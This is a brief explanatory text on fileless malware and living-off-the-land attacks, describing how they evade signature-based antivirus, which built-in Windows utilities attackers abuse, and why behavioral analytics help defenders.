Fileless Malware and Living-off-the-Land Attacks

Traditional malware writes executable files to disk, giving signature-based antivirus an opportunity to scan and detect them. Fileless malware operates entirely in memory — or abuses legitimate tools already installed — leaving no traditional malware files for AV to find. This dramatically reduces detection rates against signature-based tools. Security vendors report that fileless malware attacks are 10x more likely to succeed than file-based attacks. The 2016 Bangladesh Bank heist, the 2017 Petya/NotPetya variants, and countless nation-state intrusions have leveraged fileless techniques to maintain persistence and evade detection.

Living-off-the-land (LotL) attacks use legitimate tools and utilities already present on the victim system to carry out malicious actions. These tools — PowerShell, WMI, certutil, mshta, regsvr32, rundll32 — are trusted by OS and security software because they have legitimate purposes. An attacker who exclusively uses built-in tools can blend into normal administrative activity. The challenge for defenders is distinguishing malicious use of these tools from legitimate administrative work. This is why behavioral analytics and contextual awareness are more effective than signature detection for LotL techniques.